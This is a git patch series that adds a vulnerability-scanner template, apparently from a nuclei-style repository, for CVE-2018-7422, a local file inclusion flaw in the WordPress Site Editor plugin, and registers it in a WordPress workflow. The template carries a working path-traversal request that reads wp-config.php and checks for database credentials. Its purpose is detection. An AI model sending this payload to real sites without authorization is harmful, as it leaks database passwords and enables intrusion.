From a4ffb88b17e5692e638c24a29a33dc0457775dd1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 15:49:26 +0530 Subject: [PATCH 1/2] Added CVE-2018-7422 --- cves/2018/CVE-2018-7422.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-7422.yaml diff --git a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml new file mode 100644 index 0000000000..0662aac51c --- /dev/null +++ b/cves/2018/CVE-2018-7422.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-7422 + +info: + name: WordPress Site Editor Plugin LFI + author: LuskaBol + severity: high + tags: cve,cve2018,wordpress,wp-plugin,lfi + description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. + reference: https://www.exploit-db.com/exploits/44340 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From b5dab216c57760589ed16e8f6a34a5f960372d54 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 15:50:35 +0530 Subject: [PATCH 2/2] wp workflow update --- workflows/wordpress-workflow.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 48e27c3964..a81be966be 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -14,6 +14,7 @@ workflows: - template: cves/2016/CVE-2016-10033.yaml - template: cves/2017/CVE-2017-1000170.yaml - template: cves/2018/CVE-2018-3810.yaml + - template: cves/2018/CVE-2018-7422.yaml - template: cves/2019/CVE-2019-6112.yaml - template: cves/2019/CVE-2019-6715.yaml - template: cves/2019/CVE-2019-9978.yaml